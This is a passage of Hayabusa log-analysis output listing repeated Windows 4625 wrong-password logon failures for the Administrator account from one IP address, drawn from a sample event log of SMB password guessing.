+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jt2lDRFWwi6adwlB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G9MGvle35u5OGB5o | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJgLFM2vrnKuj5N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8HRyDAzwKj9bfnA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J65LcwnRgEob9wjY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhas9e1fwDZ1Fxvt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5qJRSpjS6tZJjNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: bo4HAgP2tw0GmZ4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zv0cbLCD7E05i0g5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FIKsQLk5iPyKoeqM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RiHAaBszJBGe2deQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8em4eOiqze683Cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86lXQsnn7dae93tW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Iu8olNGPmhxh6iNu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZYtN5EMHxcNqID6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mtUQGxrMoPkpUQCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYh4e3bpePhDoRwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UkC8E9uKpCgD1BHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZCDxpmDZbpGCey3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SS2dxS3WvCrAyiB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YT3VHxKNf8q14rro | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fx9HQT3u3Ig6vJ3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FukPQsr4SXRshyTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7AutKUyPELNRUcA4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 38gBkWcYdZW6Wcdz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HMKnLRQCDn1CHZdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ShGnRYHfVSuPvfcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LXVWG3Yl0utv98Zf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VDfa0UebgleQMK5U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxTLJJsWs9dOc5JC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7cKtymmsQJSM6zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbtC0srNyvkIHOSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPGlJ6ZjGSfUKrCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Uw95Ema8vWlRXKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hHTrBmhkjGLTNt2R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJeRVGKULJIo76aa | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kipf0Z2Tse2eWoxa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnP7tmMJXDVzIDim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CBeMt62oqlIICShT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIfXRZQkKRJAw4er | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wrqSJPALo5QtUnS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 81Mm67AdwpPJMCMm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jwq5jXlMRU1SNLO5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d7OYj8ynCEl5dG9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YzT8vF7ANYnjSRgd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4eYIoww4uL6oYZu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DpO8L2Fky4zYwp2q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGmxSy48sphENTiY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tQVAkjteLFK0hbyE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMWKsQ8l0j9fZPfA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ct7xYUYH9sr7mva | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBn0XxaPOZQokJ0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nQELRxrGuXqkYgO3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5eT0mykgLNZQygq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qMyIqRidF6oBdzog | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ULnnFcF98k9zpNTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j5k02pcelZNGwF3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qfcC6LqJqs0EeGjE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: mXALYkkitmyAFq14 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIqQmExq22WrW4md | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ydHqjdZhLMI9gjfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSe45VZNPdovPbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hiHlcR6qNGE0P7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iT3jPdHr89RqPlyd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0QFnABeYK39XEntR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5plMYSBQi5mKmdlk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TaxWckQUCMgWvCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81xZ7iisEyTABmUm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qYiQ2xjMQFQwH2XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRN8e3yzZzxc2p3A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCa6PN0C7XznvipG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hFqjIXbEb7eWUFUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkrVjLgnJZlIyXpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2r5tyuIYijAXN5be | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AgjQNe9hQrLIETDn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
